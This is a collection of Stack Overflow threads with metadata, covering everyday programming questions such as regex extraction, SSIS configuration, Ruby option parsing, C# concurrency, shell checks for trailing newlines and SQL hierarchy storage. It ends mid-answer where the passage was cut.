A: I had this happen a few times and it happened again today for a new reason. I normally run my project through IIS but needed to run it locally to debug. I normally run on port 80 in IIS and 81 in debug, but I had some settings in the web.config that used 80 so I just killed the site in IIS and switched the website to port 80 in the project settings. For whatever reason, this messed everything up and created the problem described in the OP. I started trying things one by one, including all the advice mentioned here, but switching the port back to 81 in the project settings is what ended up working.
A: Just to add my two cents with this problem.
The only thing from all the above that worked for me was the "Clean" and then delete anything left in the bin folder. Rebuild and all controls started working then.
A: FYI...I was having this problem too and I ended up fixing it by deleting the existing .designer.vb file, right-clicking on the project and choosing Convert to Web Application. It then showed the real "error" that was causing the GUI to crap itself. Turned out I had used the same name for 2 other labels but that wasn't being shown in the error list window. Once I renamed one of the 2 other labels it built fine and stopped giving me trouble.
A: You have to add
runat="server"
to each element in your page.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38670",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "32"
} |
Q: Does Adobe Flash support databases? Which databases does Adobe Flash support, if any?
A: None.
Instead, you would need to create some middleware (say, a webservice) that you talked to that did the database CRUD for you.
A: None, really.
As others have said, the best solution is to have something in between. I personally prefer amfphp for larger datasets and plain xml for smaller stuff, especially since they introduced E4X (way better XML handling) in ActionScript 3.
However, since Flash can do socket communication, it is possible to talk directly to a server. This is very fast, but you're basically opening up your database to the world.
I've never used any of these, but the major ones seem to be asql and assql.
Also, flash running in Adobe AIR has support for sqlite databases.
A: Agree with @SCdF, create a service in php or any other language that takes a modified query from flash, executes it and returns the DB response. Make sure that it only takes a connection from its own local IP address or something like that to prevent "unintentional use".
A: You should look at this article. Also you could look into Flex Data Services. Usually Flex is more suited for application that need a lot of access to data, but for simple things in flash you should use some Xml data sources, and write the xml source yourself in something like php, asp, python, perl etc.. like others have pointed out.
A: @SCdF is correct. From the horse's mouth:
A Macromedia Flash movie cannot
communicate directly with a database.
However, Macromedia Flash movies can
"talk" to server-side applications
(also referred to as "middleware").
Middleware can query a database and
relay data back and forth. There are
many server applications available.
Some of the most common are CGI, ASP,
PHP, ColdFusion and Tango.
A: What about Blaze DS (which used to be Flex Data Services) and LiveCycle Data Services?
A: Zend AMF is a beast! From the creator of AMFPHP, but Zend AMF is supported by both Adobe and Zend. While AMFPHP is a bit more robust, the creator (Wade Arnold) of it seems to be focused on Zend AMF and it is becoming much better.
If you want something more enterprise level I would advise using Blaze DS or LiveCycle as suggested by prochaine.
A: If you want to go the nosql route, there is an opensource actionscript library for communicating with CouchDb: http://code.google.com/p/as3relax/
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38674",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: How to provide next page of updated content? Feel free to edit the title if you know how to formulate the question better. (Tagging is a problem as well.) The problem may be too difficult in this general form, so let us consider a concrete example.
You get a screenful of stackoverflow questions by requesting /questions ?sort=newest page. Next page link leads to /questions?page=2 &sort=newest. I suppose that at server side, the request is translated into an SQL query with LIMIT clause. Problem with this approach is, that if new question were added while user browses first page, his second page will start with some questions he already saw. (If he has 10 question per page, and 10 new questions happened to be added, he’ll get exactly the same content second time!)
Is there an elegant way to solve this common problem? I realize that it is not that big a problem, at least not for stackoverflow, but still.
The best idea I have (apart from storing request history per client) is to use /questions?answer_id=NNN format. Server returns a page that starts with the requested answer, and puts the id of the first answer on the next page into next page link. There must be a way to write SQL for that, right?
Is it how it usually done? Or there is a better way?
A: This can't be done an easy way. For instance, the "Unanswered" list here at stackoverflow is sorted by number of votes. So if you'd save the last ID of the page you're viewing (in a cookie, request, session, whereever) and someone upvotes a post while you're browsing page 2, page 3 isn't complete since the recently upvoted post could have been moved to page 1 or 2.
Only way to do it is to load the complete list in someones session. Please don't...
As already mentioned, let's hope people are used to this by now.
A: Most web sites I've seen don't solve this problem - they show you a page including some content you've already seen.
You might consider that a feature - when you click "next" and see some content you're seen before, it's a signal that you want to go back to the front again because there's some new content.
A: Tag each question with its time entered into the database, carry the time the frontpage was last loaded as a cookie or part of the URL, and limit the search to items n through n+displaynum as you go forward.
But I wouldn't bother. This behavior is uniform enough that most users expect it, and it serves as a flag for when new data is becoming available. You can even open a new tab/window that starts back at the top of the list to see what has come up.
A: I believe the SQL (for MySQL) would be:
SELECT *
FROM entries
WHERE entry_id >= @last_viewed_entry_id
ORDER BY entry_id
LIMIT 50
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38680",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: How to grab the contents of HTML tags? Hey so what I want to do is snag the content for the first paragraph. The string $blog_post contains a lot of paragraphs in the following format:
<p>Paragraph 1</p><p>Paragraph 2</p><p>Paragraph 3</p>
The problem I'm running into is that I am writing a regex to grab everything between the first <p> tag and the first closing </p> tag. However, it is grabbing the first <p> tag and the last closing </p> tag which results in me grabbing everything.
Here is my current code:
if (preg_match("/[\\s]*<p>[\\s]*(?<firstparagraph>[\\s\\S]+)[\\s]*<\\/p>[\\s\\S]*/",$blog_post,$blog_paragraph))
echo "<p>" . $blog_paragraph["firstparagraph"] . "</p>";
else
echo $blog_post;
A: If you use preg_match, use the "U" flag to make it un-greedy.
preg_match("/<p>(.*)<\/p>/U", $blog_post, &$matches);
$matches[1] will then contain the first paragraph.
A: Well, sysrqb will let you match anything in the first paragraph assuming there's no other html in the paragraph. You might want something more like this
<p>.*?</p>
Placing the ? after your * makes it non-greedy, meaning it will only match as little text as necessary before matching the </p>.
A: It would probably be easier and faster to use strpos() to find the position of the first
<p>
and first
</p>
then use substr() to extract the paragraph.
$paragraph_start = strpos($blog_post, '<p>');
$paragraph_end = strpos($blog_post, '</p>', $paragraph_start);
$paragraph = substr($blog_post, $paragraph_start + strlen('<p>'), $paragraph_end - $paragraph_start - strlen('<p>'));
Edit: Actually the regex in others' answers will be easier and faster... your big complex regex in the question confused me...
A: Using Regular Expressions for html parsing is never the right solution. You should be using XPATH for this particular case:
$string = <<<XML
<a>
<b>
<c>texto</c>
<c>cosas</c>
</b>
<d>
<c>código</c>
</d>
</a>
XML;
$xml = new SimpleXMLElement($string);
/* Busca <a><b><c> */
$resultado = $xml->xpath('//p[1]');
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38691",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: ruby idioms for using command-line options I'm trying to pick up ruby by porting a medium-sized (non-OO) perl program. One of my personal idioms is to set options like this:
use Getopt::Std;
our $opt_v; # be verbose
getopts('v');
# and later ...
$opt_v && print "something interesting\n";
In perl, I kind of grit my teeth and let $opt_v be (effectively) a global.
In ruby,the more-or-less exact equivalent would be
require 'optparse'
opts.on("-v", "--[no-]verbose", TrueClass, "Run verbosely") {
|$opt_verbose|
}
opts.parse!
end
where $opt_verbose is a global that classes could access. Having classes know about global flags like that seems ... er ... wrong. What's the OO-idiomatic way of doing this?
*
*Let the main routine take care of all option-related stuff and have the classes just return things to it that it decides how to deal with?
*Have classes implement optional behaviour (e.g., know how to be verbose) and set a mode via an attr_writer sort of thing?
updated: Thanks for the answers suggesting optparse, but I should have been clearer that it's not how to process command-line options I'm asking about, but more the relationship between command-line options that effectively set a global program state and classes that should ideally be independent of that sort of thing.
A: A while back I ran across this blog post (by Todd Werth) which presented a rather lengthy skeleton for command-line scripts in Ruby. His skeleton uses a hybrid approach in which the application code is encapsulated in an application class which is instantiated, then executed by calling a "run" method on the application object. This allowed the options to be stored in a class-wide instance variable so that all methods in the application object can access them without exposing them to any other objects that might be used in the script.
I would lean toward using this technique, where the options are contained in one object and use either attr_writers or option parameters on method calls to pass relevant options to any additional objects. This way, any code contained in external classes can be isolated from the options themselves -- no need to worry about the naming of the variables in the main routine from within the thingy class if your options are set with a thingy.verbose=true attr_writer or thingy.process(true) call.
A: The optparse library is part of the standard distribution, so you'll be able to use it without requiring any third party stuff.
I haven't used it personally, but rails seems to use it extensively and so does rspec, which I guess is a pretty solid vote of confidence
This example from rails' script/console seems to show how to use it pretty easily and nicely
A: The first hit on google for "processing command line options in ruby" is an article about Trollop which seems to be a good tool for this job.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38713",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: What is the best way to create a wizard in C# 2.0? I have a winforms application where users will be creating stock items, and a time of creation there are a number of different things that need to happen.
I think the UI for this should probably be a wizard of some kind, but I'm unsure as to the best way to achieve this. I have seen a couple of 3rd party Wizard controls, and I have also seen manual implementations of making panel visible/invisible.
What are the best ways that people have used in the past, that are easy to implement, and also make it easy to add "pages" to the wizard later on if needed?
A: I know this answer has already been accepted, but I just found a better Wizard control that's free, and of course, since it's on CodeProject, includes the source, so you can modify it if it's not exactly what you want. I'm adding this as an answer for the next person to stumble across this question looking for a good Wizard control.
http://www.codeproject.com/KB/miscctrl/DesignTimeWizard.aspx
A: Here are a few more resources you should check out:
*
*This DevExpress WinForms control: http://www.devexpress.com/Products/NET/Controls/WinForms/Wizard/
*A home-grown wizards framework: http://weblogs.asp.net/justin_rogers/articles/60155.aspx
*A wizard framework by Shawn Wildermut part of the Chris Sells's Genghis framework: http://www.sellsbrothers.com/tools/genghis/
A: Use a tab-control inside a form.
Change back color to "Control" in all tab-pages.
Set "appearance" to flat buttons to get rid of the white border-stuff.
Hide the tabs by sizing the entire control so that the tabs gets pushed up "under" the title bar of the form. If you need other controls (or banner maybe) above the tab-control, then instead hide the tabs with a panel-control or similar.
Childplay to code logic for back/next buttons and very easy to extend with new pages.
A: Take a look at this article on MSDN about "inductive user interfaces". It describes a framework (and provides the code to download) based on UserControls that give you "navigation" within a form. Perfect for designing wizards.
A: The easiest way to create a wizard dialog is to use one of the third-party versions available that handle all of the "hard stuff" (the page navigation, UI framework, etc.) for you. The one I like the most is from Divelements; they have both a WinForms and a WPF version.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38719",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "26"
} |
Q: WebClient.DownloadFileAsync fails to raise exception An odd issue that I have been trying to address in a project - my calls to WebClient.DownloadFileAsync seem to be getting ignored and no exceptions are being raised. So far I have been able to determine this might be due to destination folder not existing, but from the looks of the MSDN documentation for Webclient.DownloadFileAsync this should still cause an exception to be raised. I did find one MSDN forum thread that seems to imply that this has been known to happen, but there doesn't seem to be any resolution for it. Any ideas what might be going on?
A: In an Async method, Exceptions aren't thrown, but rather passed through to the callback in the EventArgs object.
A: This issue was resolved after reviewing MSDN and the source code involved. Previously the application was only implementing the DownloadProgressChangedEventHandler to track how much of a download remained. This turned out to be the root cause of the issue as AsyncCompletedEventHandler is what is invoked when an exception occurs and not implementing this event handler leaves you with no notification of errors.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38726",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: Do you know how to implement transactions in Castle ActiveRecord? I decided to make a system for a client using Castle ActiveRecord, everything went well until I found that the transactions do not work, for instance;
TransactionScope t = new TransactionScope();
try
{
member.Save();
//This is just to see transaction working
throw new Exception("Exception");
foreach (qfh.Beneficiary b1 in l)
{
b1.Create();
}
}
catch (Exception ex)
{
t.VoteRollBack();
MessageBox.Show(ex.Message);
}
finally
{
t.Dispose();
}
But it doesn't work, I throw an Exception just to try the transaction rolls back, but for my surprise I see that the first [Save] records into the database. What is happening?
I'm new on Castle and NHibernate, firstly I saw it very attractive and I decided to go on with it and MySQL (I've never worked with this DB), I tried ActiveWriter and it seemed very promising but after a long and effortly week I see this issue and now I feel like I'm stuck and like I've wasted my time. It is supposed to be easy but right now I'm feeling a frustated cause I cannot find enough information to make this workout, can you help me?
A: You need to wrap the code in a session scope, like this:
using(new SessionScope())
{
a.Save();
b.Save();
c.Save();
}
Read more here.
A: Ben's got it. That doc is a little confusing. Refer to the last block on the page, "Nested transactions".
A: I finally fixed, it happened that I was doing wrong, I overrode the Save method of the Member class and made sessionScope inside and inside of it a transaction scope, so when a involved all of that in a transaction scope it saved in the database, so when I threw the exception everything was already saved, I think that's it.
All in all, thanks for the help.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38729",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: How to detect file ends in newline? Over at Can you modify text files when committing to subversion? Grant suggested that I block commits instead.
However I don't know how to check a file ends with a newline. How can you detect that the file ends with a newline?
A: Using only bash:
x=`tail -n 1 your_textfile`
if [ "$x" == "" ]; then echo "empty line"; fi
(Take care to copy the whitespaces correctly!)
@grom:
tail does not return an empty line
Damn. My test file didn't end on \n but on \n\n. Apparently vim can't create files that don't end on \n (?). Anyway, as long as the “get last byte” option works, all's well.
A: You could use something like this as your pre-commit script:
#! /usr/bin/perl
while (<>) {
$last = $_;
}
if (! ($last =~ m/\n$/)) {
print STDERR "File doesn't end with \\n!\n";
exit 1;
}
A: Worked for me:
tail -n 1 /path/to/newline_at_end.txt | wc --lines
# according to "man wc" : --lines - print the newline counts
So wc counts number of newline chars, which is good in our case.
The oneliner prints either 0 or 1 according to presence of newline at the end of the file.
A: Here is a useful bash function:
function file_ends_with_newline() {
[[ $(tail -c1 "$1" | wc -l) -gt 0 ]]
}
You can use it like:
if ! file_ends_with_newline myfile.txt
then
echo "" >> myfile.txt
fi
# continue with other stuff that assumes myfile.txt ends with a newline
A: @Konrad: tail does not return an empty line. I made a file that has some text that doesn't end in newline and a file that does. Here is the output from tail:
$ cat test_no_newline.txt
this file doesn't end in newline$
$ cat test_with_newline.txt
this file ends in newline
$
Though I found that tail has get last byte option. So I modified your script to:
#!/bin/sh
c=`tail -c 1 $1`
if [ "$c" != "" ]; then
echo "no newline"
fi
A: A complete Bash solution with only tail command, that also deal correctly with empty files.
#!/bin/bash
# Return 0 if file $1 exists and ending by end of line character,
# else return 1
[[ -s "$1" && -z "$(tail -c 1 "$1")" ]]
*
*-s "$1" checks if the file is not empty
*-z "$(tail -c 1 "$1")" checks if its last (existing) character is end of line character
*the all [[...]] conditional expression is returned
You can also defined this Bash function to use it in your scripts.
# Return 0 if file $1 exists and ending by end of line character,
# else return 1
check_ending_eol() {
[[ -s "$1" && -z "$(tail -c 1 "$1")" ]]
}
A: Or even simpler:
#!/bin/sh
test "$(tail -c 1 "$1")" && echo "no newline at eof: '$1'"
But if you want a more robust check:
test "$(tail -c 1 "$1" | wc -l)" -eq 0 && echo "no newline at eof: '$1'"
A: The read command can not read a line without newline.
if tail -c 1 "$1" | read -r line; then
echo "newline"
fi
Another answer.
if [ $(tail -c 1 "$1" | od -An -b) = 012 ]; then
echo "newline"
fi
A: I'm coming up with a correction to my own answer.
Below should work in all cases with no failures:
nl=$(printf '\012')
nls=$(wc -l "${target_file}")
lastlinecount=${nls%% *}
lastlinecount=$((lastlinecount+1))
lastline=$(sed ${lastlinecount}' !d' "${target_file}")
if [ "${lastline}" = "${nl}" ]; then
echo "${target_file} ends with a new line!"
else
echo "${target_file} does NOT end with a new line!"
fi
A: You can get the last character of the file using tail -c 1.
my_file="/path/to/my/file"
if [[ $(tail -c 1 "$my_file") != "" ]]; then
echo "File doesn't end with a new line: $my_file"
fi
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38746",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "31"
} |
Q: Concurrent collections in C# I'm looking for a way of getting a concurrent collection in C# or at least a collection which supports a concurrent enumerator. Right now I'm getting an InvalidOperationException when the collection over which I'm iterating changes.
I could just deep copy the collection and work with a private copy but I'm wondering if there is perhaps a better way
Code snippet:
foreach (String s in (List<String>) callingForm.Invoke(callingForm.delegateGetKillStrings))
{
//do some jazz
}
--edit--
I took the answer but also found that I needed to ensure that the code which was writing to the collection needed to attempt to get a lock as well.
private void addKillString(String s)
{
lock (killStrings)
{
killStrings.Add(s);
}
}
A: Other than doing a deep-copy your best bet might be to lock the collection:
List<string> theList = (List<String> )callingForm.Invoke(callingForm.delegateGetKillStrings);
lock(theList.SyncRoot) {
foreach(string s in theList) {
// Do some Jazz
}
}
A: So I'm not quite sure what you're asking, but the Parallel Extensions team has put together some stuff that might fit the bill. See this blog post in particular, about enumerating parallel collections. It also contains a link to download the Parallel CTP, and you can of course browse through the rest of the blog posts to get an idea of what the CTP is meant to do and how the programming model works.
A: If you want to use the FCL collections, then locking is the only way to support iteration / modification from multiple threads that may overlap.
Be careful what you use as your lock object, though. Using SyncRoot is only a good idea if the collection itself is a private member of the class that uses it. If the collection is protected or public, then a client of your class can take its own lock on your SyncRoot, potentially deadlocking with code in your class.
If you are interested in taking a look at a 3rd-party collection library, I recommend the excellent C5 Generic Collection Library. They have a family of tree-based collections that can easily and safely be modified and iterated at the same time without locking - see sections 8.10 and 9.11 of their (excellent) documentation for details.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38756",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: What design pattern is PEAR DB_DataObject implementing? DB_DataObject does not appear to be ActiveRecord because you do not necessarily store business logic in the "table" classes. It seems more like Table Data Gateway or Row Data Gateway, but I really cannot tell. What I need is good ORM layer that we can use with DataMapper and a DomainModel. Any ideas?
A: Follow this link to read what DB_DO is. In a nutshell, it doesn't implement a specific pattern, it just aims to provide a common interface. The idea is to not rebuild the same basic code in each project.
As for an ORM, I'd recommend Doctrine. It implements ActiveRecord.
A: It sounds like what you're looking for is something like IBatis for PHP. Sadly, this doesn't yet exist. I've actually written some custom DataMapper stuff based on PDO for the current application I'm working on to achieve a persistence ignorant domain layer. It's definitely more work to develop and maintain though, so I would suggest if at all possible, go with an existing data layer implementation like Doctrine for most of your needs.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38763",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: How do I use a different database connection for package configuration? I have an SSIS Package that sets some variable data from a SQL Server Package Configuration Table. (Selecting the "Specify configuration setings directly" option)
This works well when I'm using the Database connection that I specified when developing the package. However when I run it on a server (64 bit) in the testing environment (either as an Agent job or running the package directly) and I Specify the new connection string in the Connection managers, the package still reads the settings from the DB server that I specified in development.
All the other Connections take up the correct connection strings, it only seems to be the Package Configuration that reads from the wrong place.
Any ideas or am I doing something really wrong?
A: The only way I was able to do this was to use Windows Environment Variables. You can specify things like connection strings and user preferences in environment variables, and then pick up those environment variables from your SSIS Task.
A: I prefer to use Server Aliases in the SQL Client Configuration. That way, when you decide to point the package to another SQL Server it is as simple as editing the alias to point to the new server, no editing necessary in the SSIS package. When moving the package to a live server, you need to add the aliases, and it works.
This also helps when you have a real painful naming convention for servers, the alias can be a more descriptive name than the actual machine name.
A: I didn't actually understand your question completely but I store my connection settings in a configuration files usually one for each environment like dev, production etc. The packages read the connection settings from the config files when they are run.
A: When you're creating a job to call the SSIS package, and you're setting up the step, there is a tabbed area. The default tab is where you set the package name, and the next tab over is where you can set the configuration file. Have a config file for each package, and change for the server (dev, test, prod). The config file can be put directly on the dev, test, and prod servers, and then point to them when setting up that job.
A: If u are using SQL Server Package Configuration then all the properties of the packages will come from SQL Server table - Please check that
A: We want to keep our package configs in a database table, we know it gets backuped with our other data and we know where to find it. Just a preference.
I have found that to get this to work I can use an environment variable configuration to set the connection string of the connection manager that I am reading my package config from. (Although I had to restart the SQL Server agent before it could find the new environment variable. Not ideal when I deploy this to Production)
Looks Like when you run an SSIS package as a step in a scheduled task it works in this order:
*
*Load each of the Package Configs in the order they appear in the Package Configuations Organiser
*Set the Connection Strings from the Data sources tab in the Job Step properties of the Scheduled Job
*Start running package.
I would have expected the first 2 to be the other way around so that I can set the data source for my package config from the scheduled job. That is where I would expect other people to look for it when maintaining the package.
A: SSIS security the way it stands is terrible. No one will be able to support things when I am out of the office. The job never reads from the configuration file...I give up. It only works when I edit the string in the Data sources tab. However the password gets lost if you happen to go into the job a second time. Terrible design, absolutely horrible. You would think that when you specify a xml file in the job step it would read the connection string from there that is defined, but it does not. Does this really work for anyone else?
A: Goto the package properties and set deployment True. This should work for what you have done.
A: I had the identical question, and got the same answer, i.e. you cannot edit the connection string used for package configurations hosted in SQL Server, except if you specify that the SQL Server connection string should be in an environment variable.
This unfortunately does not work in my dev setup, where two environments are hosted on the same machine. I ended up following Scott Coleman's approach as detailed on SQL Server Central [Free sign-up and a good site]. The trick is that you create a view to store your configuration settings on one central server, and then use the machine that connects to it to determine which environment is active.
I used that approach, but also used the User connecting to the environment to make a determination, because my test and dev setups run on the same SSIS instance, but as different user names. Scott suggests in the comments that the application name should be set, but this cannot be changed in the package execution job step, so it was not an option.
One other caveat that I found was that I had to add "Instead of" triggers to my view to do the inserts, updates and deletes for configuration variables.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38766",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: How would you extract data from a MS Project .mpp file? I need to extract data from a .mpp file on the network and combine it with other data from several different databases. The application can be written in Perl, VB6, VB.net or C# but must be easily scheduled from a Windows based server.
What would you recommend to extract the MS Project data with no user intervention?
Is there any ODBC drivers available for MS Project?
Are there any modules (for Perl, VB, VB.net or C#) for opening a .mpp and reading activity data?
A: I would recommend using MPXJ (mpxj.sf.net) to extract data from Microsoft Project files. Don't be put off by the fact that it was originally a Java library - the current release of MPXJ includes native .net dlls as well as the original Java JAR file, thanks to the magic of IKVM.
Disclaimer: I maintain MPXJ.
A: MPP does have its own object model that can be used to access data in it. The info should be available here: http://msdn.microsoft.com/en-us/office/aa905469.aspx
A: Hope the following helps...
http://www.codeproject.com/KB/cs/PrjXlsRpt.aspx
Rgds
A: In order to read the MPP data you can use Aspose.Tasks for .NET. This component is a normal .NET assembly and can be used with any .NET application. It provides simple API to access project elements and data.
Disclosure: I work as developer evangelist at Aspose.
A: I have the same need. Here is what I found so far.
There is an OLEDB provider for microsoft projects, up to version MP 2007.
If Google it, there are enough sites quoting the connection string, but here is the one quote:
oConn.Open "Provider=Microsoft.Project.OLEDB.9.0;" & _
"Project Name=c:\somepath\myProject.mpp"
The problem with this approach seems to be that you have to install MS Project on the server. It is nuisance in any case, and an impossibility for me using hosting environtment.
So you are down to parsing .mpp. MPXJ is an excellent library as one commenter above suggests, and I can afford to wait, so I am waiting for them to release .NET version.
If you are resolved to get it done, get the code and see what they are doing. Other then in their source code/comments there is no (to my knowledge) documentation of the format.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38769",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: What SPN do I need to set for a net.tcp service? I have a wcf application hosted in a windows service running a local windows account. Do I need to set an SPN for this account? If so, what's the protocol the SPN needs to be set under? I know how to do this for services over HTTP, but have never done it for net.tcp.
A: Change the service account to an AD account and register the SPN's as shown. Use your own service name e.g. fooservice
setspn -A fooservice/servermachinename domain\serviceAccountName
setspn -A fooservice/servermachinename.fullyqualifieddomainname
domain\serviceAccountName
In the client config set:
<identity>
<serviceprincipalname value="fooservice/servermachinename" />
</identity>
A: By default (i.e. out of the box) net.tcp services are unsecured and don't perform any authentication at all. So you won't need (and in fact can't) set a service principal name.
If you need to authenticate, then check the net.tcp security modes on MSDN. The best way to understand the different combinations is to experiment!
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38779",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "6"
} |
Q: Visual Studio equivalent to Delphi bookmarks I use Delphi for many years, and although I have now moved on to Visual Studio I still fondly remember numbered bookmarks (CTRL+K+1 to set bookmark 1, CTRL+Q+1 to goto bookmark 1).
Is there a Visual Studio equivalent? I'm find the dumb bookmarks in VS a chore after Delphi. I want to bookmark then return to a specific place in the file.
A: Ctrl K + Ctrl K - Add/Remove Bookmark on Line
Ctrl K + Ctrl N - Go to Next Bookmark
Ctrl K + Ctrl P - Go to Previous Bookmark
There are other options as well. Look under Edit->Bookmarks menu,
A: More a comment on your original question than an actual answer but Delphi has had much easier to remember (and type) keyboard shortcuts than what you quote available for quite some time now:
*
*Set bookmark 1: Ctrl-Shift-1
*Go to bookmark 1: Ctrl-1
If you ever go back to Delphi, this should make your life so much easier! ;)
A: DPack can give you numbered bookmarks in VisualStudio.
A: I find this one also very useful:
CtrlK + CtrlL - Clear alll bookmarks
A: Just to amplify Lars Truijens answer. DPack is a GExperts like plugin for visual studio. I found it great help when moving from the Delphi IDE to Visual Studio.
A: There is a Bookmark Window. Go to menu View/Bookmark Window (Ctrl+K, Ctrl+W).
In there you can see all your bookmarks and rename them. That is a lot better than just seeing the numbers.
For some reason they don't allow to order that list by clicking in a column header, but you can drag the bookmarks and accommodate them in the order you want.
A: I use:
*
*CTRL-F2 toggle bookmark
*F2 next bookmark
*SHIFT-F2 previous bookmark
*CTRL-SHIFT-F2 clear all bookmarks
BTW, after using Visual Studio for years I just found about a couple of months ago that you can press ALT and drag mouse to mark a column or a square.
A: VSBookmarks gives something like the fantastic Delphi bookmarks feature. Tested and works in Visual Studio 2019.
*
*Extensions > Search "VSBookmarks" (v1.7 at time of writing)
*Install and restart Visual Studio
*Use Ctrl + Shift + N to set a bookmark
*Use Ctrl + N to move to a previous bookmark
There will likely be conflicts with existing keyboard shortcuts. To view and edit these:
*
*Tools > Options > Environment > Keyboard
*In "Press shortcut keys" type Ctrl + Shift + 1
*See which command(s) are currently assigned to the shortcut
*Find the command in the list and remove the shortcut
*Repeat for Ctrl + Shift + 1 through Ctrl + 9
VSBookmarks applies only within the current file (which is the Delphi behaviour), but is not configurable with just a single colour for the bookmark.
Delphi is an awesome language and editor. Thanks to Sergey Vinyar and Alessandro Fragnani (for the Numbered Bookmarks extension in Visual Studio Code) for keeping the flame alive.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38784",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Web Service Namespace Dynamic Naming I have a web-service that I will be deploying to dev, staging and production. Along with this will be an ASP.net application that will be deploying separately but also in those three stages.
What is the most pragmatic way to change the following line in the web-service to match the current environment?
[WebService(Namespace = "http://dev.mycompany.com/MyAppsWebService")]
[WebService(Namespace = "http://stage.mycompany.com/MyAppsWebService")]
[WebService(Namespace = "http://mycompany.com/MyAppsWebService")]
A: Your webservice object has a "URL" property on it which can be set via the web.config file. There's a config file that gets created when you add the web reference to your application that you should copy the contents of to your web.config or app.config file. You can then deploy the config file and not have to manage any code changes to accomodate the change in url.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38789",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: Which database table Schema is more efficient? Which Database table Schema is more efficient and why?
"Users (UserID, UserName, CompamyId)"
"Companies (CompamyId, CompanyName)"
OR
"Users (UserID, UserName)"
"Companies (CompamyId, CompanyName)"
"UserCompanies (UserID, CompamyId)"
Given the fact that user and company have one-to-one relation.
A: well that's a bit of an open ended question and depends on your business rules. The first option you have only allows one company to be mapped to one user. you're defining a many-to-one relationship.
The second schema defines a many-to-many relationship which allows multiple users to be mapped to multiple companies.
They solve different problems and depending on what you're trying to solve will determine what schema you should use.
Strictly speaking from a "transactions" point of view, the first schema will be quicker because you only have to commit one row for a user object to be associated to a company and to retrieve the company that your user works for requires only one join, however the second solution will scale better if your business requirements change and require you to have multiple companies assigend to a user.
A: For sure, the earlier one is more efficient given that constraint. For getting the same information, you will have less number of joins in your queries.
A: As always it depends. I would personally go with answer number one since it would have less joins and would be easier to maintain. Less joins should mean that it requires less table and index scans.
SELECT userid, username, companyid, companyname
FROM companies c, users u
WHERE userid = companyid
Is much better than...
SELECT userid, username, companyid, companyname
FROM companies c, users u, usercompanies uc
WHERE u.userid = uc.userid
AND c.companyid = uc.companyid
A: The two schemas cannot be compared, as they have different relationships, you should proablly look at what the spec is for the tables and then work out which one fits the relationship needed.
The first one implies that a User can only be a member of one company (a belongs_to relationship). Whereas the second schema implies that a User can be a member of many companies (a has_many relationship)
If you are looking for a schema that can (or will later) support a has_many relationship then you want to go with the second one. For the reason compare:
//select all users in company x with schema 1
select username, companyname from companies
inner join users on users.companyid = companies.companyid
where companies.companyid = __some_id__;
and
//select all users in company x with schema 2
select username, companyname from companies
inner join usercompanies on usercompanies.companyid = companies.companyid
inner join users on usercompanies.userid = users.userid
where companies.companyid = __some_id__;
You have an extra join on the select table. If you only want the belongs_to relationship then the second query does more work than it should - and so makes it less efficient.
A: I think you mean "many to one" when it comes to users and companies - unless you plan on having a unique company for each user.
To answer your question, go with the first approach. One less table to store reduces space and will make your queries use less JOIN commands. Also, and more importantly, it correctly matches your desired input. The database schema should describe the format for all valid data - if it fits the format it should be considered valid. Since a user can only have one company it's possible to have incorrect data in your database if you use the second schema.
A: If User and Company really have a one-to-one relationship, then you only need one table:
(ID, UserName, CompanyName)
But I suspect you really meant that there is a one-to-many relationship between user and company - one or more users pr company but only one company pr user. In that case the two-table solution is correct.
If there is a many-to-many relationship (a company can have several users and a user can be attached to several companies), then the three-table solution is correct.
Note that efficiency is not really the issue here. Its the nature of the data that dictates which solution you should use.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38791",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: SQL - How to store and navigate hierarchies? What are the ways that you use to model and retrieve hierarchical info in a database?
A: FYI: SQL Server 2008 introduces a new HierarchyID data type for this sort of situation. Gives you control over where in the "tree" your row sits, horizontally as well as vertically.
A: I like the Modified Preorder Tree Traversal Algorithm. This technique makes it very easy to query the tree.
But here is a list of links about the topic which I copied from the Zend Framework (PHP) contributors webpage (posted there by Posted by Laurent Melmoux at Jun 05, 2007 15:52).
Many of the links are language agnostic:
There is 2 main representations and algorithms to represent hierarchical structures with databases :
*
*nested set also known as modified preorder tree traversal algorithm
*adjacency list model
It's well explained here:
*
